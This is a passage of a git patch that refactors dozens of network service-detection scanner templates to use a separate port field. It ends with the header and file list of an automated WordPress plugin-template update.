 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:25"
+    port: 25
 
     matchers-condition: and
     matchers:
diff --git a/network/detection/expn-mail-detect.yaml b/network/detection/expn-mail-detect.yaml
index 6b1525f20b..4408acfc97 100644
--- a/network/detection/expn-mail-detect.yaml
+++ b/network/detection/expn-mail-detect.yaml
@@ -18,7 +18,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:25"
+    port: 25
 
     matchers:
       - type: word
diff --git a/network/detection/finger-detect.yaml b/network/detection/finger-detect.yaml
index 0080ce646e..80a548d404 100644
--- a/network/detection/finger-detect.yaml
+++ b/network/detection/finger-detect.yaml
@@ -18,7 +18,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:79"
+    port: 79
 
     matchers:
       - type: word
diff --git a/network/detection/gnu-inetutils-ftpd-detect.yaml b/network/detection/gnu-inetutils-ftpd-detect.yaml
index 7731e2db8a..85460f07dc 100644
--- a/network/detection/gnu-inetutils-ftpd-detect.yaml
+++ b/network/detection/gnu-inetutils-ftpd-detect.yaml
@@ -17,8 +17,7 @@ tcp:
       - data: "\n"
     host:
       - "{{Hostname}}"
-      - "{{Host}}:21"
-
+    port: 21
     matchers:
       - type: word
         words:
diff --git a/network/detection/gopher-detect.yaml b/network/detection/gopher-detect.yaml
index d2d8621175..3d1ee9fdcb 100644
--- a/network/detection/gopher-detect.yaml
+++ b/network/detection/gopher-detect.yaml
@@ -19,7 +19,7 @@ tcp:
       - data: "\r\n"
     host:
       - "{{Hostname}}"
-      - "{{Host}}:70"
+    port: 70
 
     matchers:
       - type: dsl
diff --git a/network/detection/ibm-d2b-database-server.yaml b/network/detection/ibm-d2b-database-server.yaml
index 868d874ac2..c6a68dcb83 100644
--- a/network/detection/ibm-d2b-database-server.yaml
+++ b/network/detection/ibm-d2b-database-server.yaml
@@ -25,7 +25,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:50000"
+    port: 50000
 
     matchers-condition: and
     matchers:
diff --git a/network/detection/imap-detect.yaml b/network/detection/imap-detect.yaml
index d3285206ca..c976843061 100644
--- a/network/detection/imap-detect.yaml
+++ b/network/detection/imap-detect.yaml
@@ -22,7 +22,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:143"
+    port: 143
 
     matchers-condition: and
     matchers:
diff --git a/network/detection/iplanet-imap-detect.yaml b/network/detection/iplanet-imap-detect.yaml
index d0c95983ae..60bc7b1b86 100644
--- a/network/detection/iplanet-imap-detect.yaml
+++ b/network/detection/iplanet-imap-detect.yaml
@@ -20,7 +20,7 @@ tcp:
       - data: "\n"
     host:
       - "{{Hostname}}"
-      - "{{Host}}:110"
+    port: 110
 
     matchers:
       - type: word
diff --git a/network/detection/microsoft-ftp-service.yaml b/network/detection/microsoft-ftp-service.yaml
index ba87bbdfad..b0cc34b288 100644
--- a/network/detection/microsoft-ftp-service.yaml
+++ b/network/detection/microsoft-ftp-service.yaml
@@ -18,7 +18,7 @@ tcp:
       - data: "\n"
     host:
       - "{{Hostname}}"
-      - "{{Host}}:21"
+    port: 21
 
     matchers:
       - type: word
diff --git a/network/detection/mikrotik-ftp-server-detect.yaml b/network/detection/mikrotik-ftp-server-detect.yaml
index 6c54ea1f55..32fdf0196f 100644
--- a/network/detection/mikrotik-ftp-server-detect.yaml
+++ b/network/detection/mikrotik-ftp-server-detect.yaml
@@ -17,7 +17,7 @@ tcp:
       - data: "\n"
     host:
       - "{{Hostname}}"
-      - "{{Host}}:21"
+    port: 21
 
     matchers:
       - type: word
diff --git a/network/detection/mikrotik-routeros-api.yaml b/network/detection/mikrotik-routeros-api.yaml
index 73c3ccdfee..8bc12b6619 100644
--- a/network/detection/mikrotik-routeros-api.yaml
+++ b/network/detection/mikrotik-routeros-api.yaml
@@ -23,7 +23,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:8728"
+    port: 8728
 
     matchers:
       - type: word
diff --git a/network/detection/mongodb-detect.yaml b/network/detection/mongodb-detect.yaml
index 731a52674c..767acb5329 100644
--- a/network/detection/mongodb-detect.yaml
+++ b/network/detection/mongodb-detect.yaml
@@ -23,7 +23,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:27017"
+    port: 27017
     read-size: 2048
 
     matchers:
diff --git a/network/detection/msmq-detect.yaml b/network/detection/msmq-detect.yaml
index 619301c3cb..c5f820607d 100644
--- a/network/detection/msmq-detect.yaml
+++ b/network/detection/msmq-detect.yaml
@@ -24,8 +24,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:1801"
-
+    port: 1801
     read-size: 2048
 
     matchers:
diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml
index f30568179c..f7e5ee3c42 100644
--- a/network/detection/mysql-detect.yaml
+++ b/network/detection/mysql-detect.yaml
@@ -22,7 +22,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:3306"
+    port: 3306
 
     matchers:
       - type: word
diff --git a/network/detection/openssh-detect.yaml b/network/detection/openssh-detect.yaml
index 68cd4ad687..b2247e0ca9 100644
--- a/network/detection/openssh-detect.yaml
+++ b/network/detection/openssh-detect.yaml
@@ -23,7 +23,7 @@ info:
 tcp:
   - host:
       - "{{Hostname}}"
-      - "{{Host}}:22"
+    port: 22
 
     matchers:
       - type: regex
diff --git a/network/detection/pgsql-detect.yaml b/network/detection/pgsql-detect.yaml
index 28cd603ce5..aa2eac58ee 100644
--- a/network/detection/pgsql-detect.yaml
+++ b/network/detection/pgsql-detect.yaml
@@ -28,7 +28,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:5432"
+    port: 5432
     read-size: 2048
 
     matchers-condition: and
diff --git a/network/detection/pop3-detect.yaml b/network/detection/pop3-detect.yaml
index d38ba3ffc8..e0188625a5 100644
--- a/network/detection/pop3-detect.yaml
+++ b/network/detection/pop3-detect.yaml
@@ -24,7 +24,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:110"
+    port: 110
 
     matchers:
       - type: word
diff --git a/network/detection/proftpd-server-detect.yaml b/network/detection/proftpd-server-detect.yaml
index df5df5d2da..f00fcb785d 100644
--- a/network/detection/proftpd-server-detect.yaml
+++ b/network/detection/proftpd-server-detect.yaml
@@ -17,7 +17,7 @@ tcp:
       - data: "\n"
     host:
       - "{{Hostname}}"
-      - "{{Host}}:21"
+    port: 21
 
     matchers:
       - type: word
diff --git a/network/detection/rabbitmq-detect.yaml b/network/detection/rabbitmq-detect.yaml
index 8ccf9cecaa..d30db181a7 100644
--- a/network/detection/rabbitmq-detect.yaml
+++ b/network/detection/rabbitmq-detect.yaml
@@ -20,7 +20,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:5672"
+    port: 5672
 
     matchers-condition: and
     matchers:
diff --git a/network/detection/rdp-detect.yaml b/network/detection/rdp-detect.yaml
index 21a817a040..0d76f3cf69 100644
--- a/network/detection/rdp-detect.yaml
+++ b/network/detection/rdp-detect.yaml
@@ -22,8 +22,8 @@ tcp:
     read-size: 2048
 
     host:
-      - "{{Host}}:3389"
       - "{{Hostname}}"
+    port: 3389
 
     matchers:
       - type: word
diff --git a/network/detection/redis-detect.yaml b/network/detection/redis-detect.yaml
index 9f1431ef6a..a10cd201cf 100644
--- a/network/detection/redis-detect.yaml
+++ b/network/detection/redis-detect.yaml
@@ -19,10 +19,8 @@ tcp:
       - data: "*1\r\n$4\r\ninfo\r\n"
 
     host:
-      - "{{Hostname}}"
-      - "{{Host}}:6379"
-      - "tls://{Hostname}}"
-      - "tls://{{Host}}:6380"
+      - "tls://{{Host}}"
+    port: 6380
     read-size: 1024
 
     matchers:
diff --git a/network/detection/riak-detect.yaml b/network/detection/riak-detect.yaml
index e52868d902..e065574dab 100644
--- a/network/detection/riak-detect.yaml
+++ b/network/detection/riak-detect.yaml
@@ -18,7 +18,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:8087"
+    port: 8087
 
     read-size: 2048
     matchers:
diff --git a/network/detection/rpcbind-portmapper-detect.yaml b/network/detection/rpcbind-portmapper-detect.yaml
index d8fa9166c5..c5e1a28a2a 100644
--- a/network/detection/rpcbind-portmapper-detect.yaml
+++ b/network/detection/rpcbind-portmapper-detect.yaml
@@ -23,7 +23,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:111"
+    port: 111
 
     matchers:
       - type: word
diff --git a/network/detection/rsyncd-service-detect.yaml b/network/detection/rsyncd-service-detect.yaml
index cf8d848e1a..fb9513e98a 100644
--- a/network/detection/rsyncd-service-detect.yaml
+++ b/network/detection/rsyncd-service-detect.yaml
@@ -22,7 +22,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:873"
+    port: 873
 
     matchers:
       - type: word
diff --git a/network/detection/rtsp-detect.yaml b/network/detection/rtsp-detect.yaml
index b9beed2b9d..43914dcbfe 100644
--- a/network/detection/rtsp-detect.yaml
+++ b/network/detection/rtsp-detect.yaml
@@ -25,7 +25,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:554"
+    port: 554
     read-size: 1024
 
     matchers:
diff --git a/network/detection/samba-detect.yaml b/network/detection/samba-detect.yaml
index cc20db7a91..7af60e0236 100644
--- a/network/detection/samba-detect.yaml
+++ b/network/detection/samba-detect.yaml
@@ -21,8 +21,7 @@ tcp:
         type: hex
     host:
       - "{{Hostname}}"
-      - "{{Host}}:139"
-
+    port: 139
     matchers-condition: and
     matchers:
       - type: word
diff --git a/network/detection/sap-router.yaml b/network/detection/sap-router.yaml
index b7cf6ff735..63aa87a552 100644
--- a/network/detection/sap-router.yaml
+++ b/network/detection/sap-router.yaml
@@ -17,7 +17,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:3299"
+    port: 3299
     read-size: 1024
 
     matchers:
diff --git a/network/detection/smb-detect.yaml b/network/detection/smb-detect.yaml
index 038dc22d2e..3d9c2982a6 100644
--- a/network/detection/smb-detect.yaml
+++ b/network/detection/smb-detect.yaml
@@ -17,7 +17,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:445"
+    port: 445
 
     matchers:
       - type: word
diff --git a/network/detection/smtp-detect.yaml b/network/detection/smtp-detect.yaml
index d63b816e07..5e263cb783 100644
--- a/network/detection/smtp-detect.yaml
+++ b/network/detection/smtp-detect.yaml
@@ -15,7 +15,8 @@ tcp:
       - data: "\r\n"
     host:
       - "{{Hostname}}"
-      - "{{Host}}:25"
+    port: 25
+
     matchers:
       - type: word
         words:
diff --git a/network/detection/sshd-dropbear-detect.yaml b/network/detection/sshd-dropbear-detect.yaml
index 96f5143603..d99362fa58 100644
--- a/network/detection/sshd-dropbear-detect.yaml
+++ b/network/detection/sshd-dropbear-detect.yaml
@@ -18,7 +18,7 @@ tcp:
       - data: "\n"
     host:
       - "{{Hostname}}"
-      - "{{Host}}:22"
+    port: 22
 
     matchers:
       - type: word
diff --git a/network/detection/starttls-mail-detect.yaml b/network/detection/starttls-mail-detect.yaml
index 2970b2d555..93df953557 100644
--- a/network/detection/starttls-mail-detect.yaml
+++ b/network/detection/starttls-mail-detect.yaml
@@ -18,7 +18,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:25"
+    port: 25
 
     matchers:
       - type: word
diff --git a/network/detection/teamspeak3-detect.yaml b/network/detection/teamspeak3-detect.yaml
index d3660c3e69..b09be70bd9 100644
--- a/network/detection/teamspeak3-detect.yaml
+++ b/network/detection/teamspeak3-detect.yaml
@@ -17,7 +17,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:2002"
+    port: 2002
 
     matchers:
       - type: word
diff --git a/network/detection/telnet-detect.yaml b/network/detection/telnet-detect.yaml
index a12206e962..e68df9520c 100644
--- a/network/detection/telnet-detect.yaml
+++ b/network/detection/telnet-detect.yaml
@@ -18,7 +18,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:23"
+    port: 23
 
     matchers:
       - type: word
diff --git a/network/detection/totemomail-smtp-detect.yaml b/network/detection/totemomail-smtp-detect.yaml
index 9bf92503a0..f2d966de42 100644
--- a/network/detection/totemomail-smtp-detect.yaml
+++ b/network/detection/totemomail-smtp-detect.yaml
@@ -17,7 +17,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:25"
+    port: 25
 
     matchers:
       - type: word
diff --git a/network/detection/vmware-authentication-daemon-detect.yaml b/network/detection/vmware-authentication-daemon-detect.yaml
index 60c21d02b4..e40312fe68 100644
--- a/network/detection/vmware-authentication-daemon-detect.yaml
+++ b/network/detection/vmware-authentication-daemon-detect.yaml
@@ -18,7 +18,7 @@ tcp:
       - data: "\n"
     host:
       - "{{Hostname}}"
-      - "{{Host}}:902"
+    port: 902
 
     matchers:
       - type: word
diff --git a/network/detection/vnc-service-detect.yaml b/network/detection/vnc-service-detect.yaml
index 0fe419db1c..b92a47d673 100644
--- a/network/detection/vnc-service-detect.yaml
+++ b/network/detection/vnc-service-detect.yaml
@@ -15,8 +15,8 @@ tcp:
   - inputs:
       - data: "\r\n"
     host:
-      - "{{Host}}:5900"
       - "{{Hostname}}"
+    port: 5900
 
     matchers:
       - type: word
diff --git a/network/detection/xlight-ftp-service-detect.yaml b/network/detection/xlight-ftp-service-detect.yaml
index 910c17e7b8..ffcb30c9f4 100644
--- a/network/detection/xlight-ftp-service-detect.yaml
+++ b/network/detection/xlight-ftp-service-detect.yaml
@@ -18,7 +18,7 @@ tcp:
       - data: "\n"
     host:
       - "{{Hostname}}"
-      - "{{Host}}:21"
+    port: 21
 
     matchers:
       - type: word
diff --git a/network/enumeration/beanstalk-service.yaml b/network/enumeration/beanstalk-service.yaml
index 364078788d..104d8c3fd1 100644
--- a/network/enumeration/beanstalk-service.yaml
+++ b/network/enumeration/beanstalk-service.yaml
@@ -20,7 +20,8 @@ tcp:
         read: 8
 
     host:
-      - "{{Host}}:11300"
+      - "{{Hostname}}"
+    port: 11300
 
     matchers:
       - type: word
diff --git a/network/enumeration/kafka-topics-list.yaml b/network/enumeration/kafka-topics-list.yaml
index 7bc3dfa4f4..fce59673c7 100644
--- a/network/enumeration/kafka-topics-list.yaml
+++ b/network/enumeration/kafka-topics-list.yaml
@@ -23,7 +23,8 @@ tcp:
         read: 1024
 
     host:
-      - "{{Host}}:9092"
+      - "{{Hostname}}"
+    port: 9092
 
     matchers-condition: or
     matchers:
diff --git a/network/enumeration/mongodb-info-enum.yaml b/network/enumeration/mongodb-info-enum.yaml
index f142bf6a5b..6f070dcde2 100644
--- a/network/enumeration/mongodb-info-enum.yaml
+++ b/network/enumeration/mongodb-info-enum.yaml
@@ -25,7 +25,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:27017"
+    port: 27017
     read-size: 2048
 
     matchers:
diff --git a/network/enumeration/niagara-fox-info-enum.yaml b/network/enumeration/niagara-fox-info-enum.yaml
index d7250f9014..80eb85050b 100644
--- a/network/enumeration/niagara-fox-info-enum.yaml
+++ b/network/enumeration/niagara-fox-info-enum.yaml
@@ -19,7 +19,7 @@ tcp:
       - data: "fox a 1 -1 fox hello\n{\nfox.version=s:1.0\nid=i:1\n};;\n"
     host:
       - "{{Hostname}}"
-      - "{{Host}}:1911"
+    port: 1911
 
     matchers:
       - type: word
diff --git a/network/enumeration/psql-user-enum.yaml b/network/enumeration/psql-user-enum.yaml
index e35f0ef8d0..eb224be71e 100644
--- a/network/enumeration/psql-user-enum.yaml
+++ b/network/enumeration/psql-user-enum.yaml
@@ -21,7 +21,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:5432"
+    port: 5432
 
     attack: clusterbomb
     payloads:
diff --git a/network/enumeration/smtp-commands-enum.yaml b/network/enumeration/smtp-commands-enum.yaml
index e87c3b61e0..10729964ed 100644
--- a/network/enumeration/smtp-commands-enum.yaml
+++ b/network/enumeration/smtp-commands-enum.yaml
@@ -23,7 +23,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:25"
+    port: 25
 
     matchers:
       - type: word
diff --git a/network/enumeration/smtp/smtp-user-enum.yaml b/network/enumeration/smtp/smtp-user-enum.yaml
index 4a8cc9d900..6749a789c3 100644
--- a/network/enumeration/smtp/smtp-user-enum.yaml
+++ b/network/enumeration/smtp/smtp-user-enum.yaml
@@ -23,7 +23,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:25"
+    port: 25
 
     attack: batteringram
     payloads:
diff --git a/network/exposures/cisco-smi-exposure.yaml b/network/exposures/cisco-smi-exposure.yaml
index 5ad14a2be3..2ac4e72017 100644
--- a/network/exposures/cisco-smi-exposure.yaml
+++ b/network/exposures/cisco-smi-exposure.yaml
@@ -26,7 +26,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:4786"
+    port: 4786
 
     matchers:
       - type: word
diff --git a/network/exposures/exposed-adb.yaml b/network/exposures/exposed-adb.yaml
index 6c05d3c22e..4a678cc68c 100644
--- a/network/exposures/exposed-adb.yaml
+++ b/network/exposures/exposed-adb.yaml
@@ -23,7 +23,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:5555"
+    port: 5555
 
     matchers:
       - type: word
diff --git a/network/exposures/exposed-dockerd.yaml b/network/exposures/exposed-dockerd.yaml
index 04ac7db27a..9fa8a541e3 100644
--- a/network/exposures/exposed-dockerd.yaml
+++ b/network/exposures/exposed-dockerd.yaml
@@ -18,7 +18,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:2375"
+    port: 2375
 
     matchers:
       - type: word
diff --git a/network/exposures/exposed-redis.yaml b/network/exposures/exposed-redis.yaml
index bf0d983473..5abd6d2c3d 100644
--- a/network/exposures/exposed-redis.yaml
+++ b/network/exposures/exposed-redis.yaml
@@ -20,10 +20,8 @@ tcp:
       - data: "info\r\nquit\r\n"
 
     host:
-      - "{{Hostname}}"
-      - "{{Host}}:6379"
       - "tls://{Hostname}}"
-      - "tls://{{Host}}:6380"
+    port: 6380
     read-size: 2048
 
     matchers-condition: and
diff --git a/network/exposures/exposed-zookeeper.yaml b/network/exposures/exposed-zookeeper.yaml
index 5bd1d628b4..87d6712ba7 100644
--- a/network/exposures/exposed-zookeeper.yaml
+++ b/network/exposures/exposed-zookeeper.yaml
@@ -17,7 +17,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:2181"
+    port: 2181
     read-size: 2048
 
     matchers:
diff --git a/network/misconfig/apache-dubbo-unauth.yaml b/network/misconfig/apache-dubbo-unauth.yaml
index ad5622afd6..0ed64221ab 100644
--- a/network/misconfig/apache-dubbo-unauth.yaml
+++ b/network/misconfig/apache-dubbo-unauth.yaml
@@ -21,7 +21,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:20880"
+    port: 20880
     read-size: 2048
 
     matchers:
diff --git a/network/misconfig/apache-rocketmq-broker-unauth.yaml b/network/misconfig/apache-rocketmq-broker-unauth.yaml
index 5b688e9d1c..eae52acaca 100644
--- a/network/misconfig/apache-rocketmq-broker-unauth.yaml
+++ b/network/misconfig/apache-rocketmq-broker-unauth.yaml
@@ -22,7 +22,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:10911"
+    port: 10911
     read-size: 2048
 
     matchers-condition: and
diff --git a/network/misconfig/clamav-unauth.yaml b/network/misconfig/clamav-unauth.yaml
index bd6b28b43a..8b5ccff311 100644
--- a/network/misconfig/clamav-unauth.yaml
+++ b/network/misconfig/clamav-unauth.yaml
@@ -22,7 +22,7 @@ tcp:
       - data: "SCAN /nonexistent/{{to_lower(rand_text_alpha(10))}}\r\n"
     host:
       - "{{Hostname}}"
-      - "{{Host}}:3310"
+    port: 3310
     read-size: 48
 
     matchers:
diff --git a/network/misconfig/clickhouse-unauth.yaml b/network/misconfig/clickhouse-unauth.yaml
index 868bf37400..3bd27b9528 100644
--- a/network/misconfig/clickhouse-unauth.yaml
+++ b/network/misconfig/clickhouse-unauth.yaml
@@ -18,7 +18,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:9000"
+    port: 9000
 
     read-size: 100
     matchers:
diff --git a/network/misconfig/dropbear-weakalgo.yaml b/network/misconfig/dropbear-weakalgo.yaml
index a17caa95ad..f597277415 100644
--- a/network/misconfig/dropbear-weakalgo.yaml
+++ b/network/misconfig/dropbear-weakalgo.yaml
@@ -22,7 +22,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:22"
+    port: 22
 
     matchers:
       - type: word
diff --git a/network/misconfig/dropbear-weakmac.yaml b/network/misconfig/dropbear-weakmac.yaml
index 1b1ffefb43..0fd36cf4fd 100644
--- a/network/misconfig/dropbear-weakmac.yaml
+++ b/network/misconfig/dropbear-weakmac.yaml
@@ -22,7 +22,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:22"
+    port: 22
 
     matchers-condition: and
     matchers:
diff --git a/network/misconfig/ganglia-xml-grid-monitor.yaml b/network/misconfig/ganglia-xml-grid-monitor.yaml
index 0c08ca64b4..a7816a7dbd 100644
--- a/network/misconfig/ganglia-xml-grid-monitor.yaml
+++ b/network/misconfig/ganglia-xml-grid-monitor.yaml
@@ -17,7 +17,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:8649"
+    port: 8649
     read-size: 2048
 
     matchers:
diff --git a/network/misconfig/memcached-stats.yaml b/network/misconfig/memcached-stats.yaml
index f0b6d59076..3d7935ea93 100644
--- a/network/misconfig/memcached-stats.yaml
+++ b/network/misconfig/memcached-stats.yaml
@@ -16,7 +16,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:11211"
+    port: 11211
     read-size: 2048
 
     matchers:
diff --git a/network/misconfig/mongodb-unauth.yaml b/network/misconfig/mongodb-unauth.yaml
index 658f0aaa48..1a68ce191f 100644
--- a/network/misconfig/mongodb-unauth.yaml
+++ b/network/misconfig/mongodb-unauth.yaml
@@ -21,7 +21,8 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:27017"
+    port: 27017
+
     read-size: 2048
     matchers:
       - type: word
diff --git a/network/misconfig/mysql-native-password.yaml b/network/misconfig/mysql-native-password.yaml
index f668b03555..83386d529c 100644
--- a/network/misconfig/mysql-native-password.yaml
+++ b/network/misconfig/mysql-native-password.yaml
@@ -18,7 +18,7 @@ info:
 tcp:
   - host:
       - "{{Hostname}}"
-      - "{{Host}}:3306"
+    port: 3306
 
     matchers:
       - type: word
diff --git a/network/misconfig/printers-info-leak.yaml b/network/misconfig/printers-info-leak.yaml
index c3c0a66b09..2bcb745a1e 100644
--- a/network/misconfig/printers-info-leak.yaml
+++ b/network/misconfig/printers-info-leak.yaml
@@ -16,7 +16,9 @@ tcp:
   - inputs:
       - data: "@PJL INFO STATUS\n"
     host:
-      - "{{Host}}:9100"
+      - "{{Hostname}}"
+    port: 9100
+
     matchers:
       - type: word
         words:
diff --git a/network/misconfig/sap-router-info-leak.yaml b/network/misconfig/sap-router-info-leak.yaml
index 92736e7e1e..ee872add7f 100644
--- a/network/misconfig/sap-router-info-leak.yaml
+++ b/network/misconfig/sap-router-info-leak.yaml
@@ -19,7 +19,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:3299"
+    port: 3299
     read-size: 2048
 
     matchers:
diff --git a/network/misconfig/tidb-native-password.yaml b/network/misconfig/tidb-native-password.yaml
index 54ccad4c2d..d131d74ee7 100644
--- a/network/misconfig/tidb-native-password.yaml
+++ b/network/misconfig/tidb-native-password.yaml
@@ -16,7 +16,7 @@ info:
 tcp:
   - host:
       - "{{Hostname}}"
-      - "{{Host}}:4000"
+    port: 4000
 
     matchers:
       - type: word
diff --git a/network/misconfig/tidb-unauth.yaml b/network/misconfig/tidb-unauth.yaml
index 5b5e8a997f..943586a9ad 100644
--- a/network/misconfig/tidb-unauth.yaml
+++ b/network/misconfig/tidb-unauth.yaml
@@ -18,7 +18,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:4000"
+    port: 4000
 
     read-size: 1024
 
diff --git a/network/misconfig/unauth-psql.yaml b/network/misconfig/unauth-psql.yaml
index cbe4f4cceb..105301b3a5 100644
--- a/network/misconfig/unauth-psql.yaml
+++ b/network/misconfig/unauth-psql.yaml
@@ -24,7 +24,7 @@ tcp:
         read: 1024
     host:
       - "{{Hostname}}"
-      - "{{Host}}:5432"
+    port: 5432
 
     matchers-condition: and
     matchers:
diff --git a/network/vulnerabilities/clockwatch-enterprise-rce.yaml b/network/vulnerabilities/clockwatch-enterprise-rce.yaml
index 3418380f5f..b42c2cc72b 100644
--- a/network/vulnerabilities/clockwatch-enterprise-rce.yaml
+++ b/network/vulnerabilities/clockwatch-enterprise-rce.yaml
@@ -22,7 +22,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:1001"
+    port: 1001
 
     matchers-condition: and
     matchers:

From e1ee1d14b9bacbde00f2bb9b0eb3b16ee1a2f70b Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sun, 17 Sep 2023 04:02:38 +0000
Subject: [PATCH 0400/1090] Auto WordPress Plugins Update [Sun Sep 17 04:02:38
 UTC 2023] :robot:

---
 helpers/wordpress/plugins/siteorigin-panels.txt                 | 2 +-
 http/technologies/wordpress/plugins/ad-inserter.yaml            | 1 -
 http/technologies/wordpress/plugins/add-to-any.yaml             | 1 -
 http/technologies/wordpress/plugins/admin-menu-editor.yaml      | 1 -
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
 http/technologies/wordpress/plugins/akismet.yaml                | 1 -
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml         | 1 -
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml    | 1 -
 .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 -
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml  | 1 -
 http/technologies/wordpress/plugins/amp.yaml                    | 1 -
 http/technologies/wordpress/plugins/antispam-bee.yaml           | 1 -
 http/technologies/wordpress/plugins/astra-sites.yaml            | 1 -
 http/technologies/wordpress/plugins/astra-widgets.yaml          | 1 -
 http/technologies/wordpress/plugins/autoptimize.yaml            | 1 -
 http/technologies/wordpress/plugins/backwpup.yaml               | 1 -
 http/technologies/wordpress/plugins/better-search-replace.yaml  | 1 -
 http/technologies/wordpress/plugins/better-wp-security.yaml     | 1 -
 .../wordpress/plugins/black-studio-tinymce-widget.yaml          | 1 -
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml       | 1 -
 http/technologies/wordpress/plugins/breeze.yaml                 | 1 -
 http/technologies/wordpress/plugins/broken-link-checker.yaml    | 1 -
 .../wordpress/plugins/child-theme-configurator.yaml             | 1 -
 http/technologies/wordpress/plugins/classic-editor.yaml         | 1 -
 http/technologies/wordpress/plugins/classic-widgets.yaml        | 1 -
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml           | 1 -
 http/technologies/wordpress/plugins/cmb2.yaml                   | 1 -
 http/technologies/wordpress/plugins/coblocks.yaml               | 1 -
 http/technologies/wordpress/plugins/code-snippets.yaml          | 1 -
 http/technologies/wordpress/plugins/coming-soon.yaml            | 1 -
 http/technologies/wordpress/plugins/complianz-gdpr.yaml         | 1 -
 .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 -
 http/technologies/wordpress/plugins/contact-form-7.yaml         | 1 -
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml     | 1 -
 http/technologies/wordpress/plugins/cookie-law-info.yaml        | 1 -
 http/technologies/wordpress/plugins/cookie-notice.yaml          | 1 -
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml     | 1 -
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml    | 1 -
 http/technologies/wordpress/plugins/custom-css-js.yaml          | 1 -
 http/technologies/wordpress/plugins/custom-fonts.yaml           | 1 -
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml    | 1 -
 http/technologies/wordpress/plugins/disable-comments.yaml       | 1 -
 http/technologies/wordpress/plugins/disable-gutenberg.yaml      | 1 -
 http/technologies/wordpress/plugins/duplicate-page.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicate-post.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicator.yaml             | 1 -
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml      | 1 -
 http/technologies/wordpress/plugins/easy-fancybox.yaml          | 1 -
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/elementor.yaml              | 1 -
 http/technologies/wordpress/plugins/elementskit-lite.yaml       | 1 -
 http/technologies/wordpress/plugins/enable-media-replace.yaml   | 1 -
 http/technologies/wordpress/plugins/envato-elements.yaml        | 1 -
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml  | 1 -
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml   | 1 -
 .../wordpress/plugins/facebook-for-woocommerce.yaml             | 1 -
 http/technologies/wordpress/plugins/fast-indexing-api.yaml      | 1 -
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml      | 1 -
 http/technologies/wordpress/plugins/flamingo.yaml               | 1 -
 http/technologies/wordpress/plugins/fluentform.yaml             | 1 -
 http/technologies/wordpress/plugins/font-awesome.yaml           | 1 -
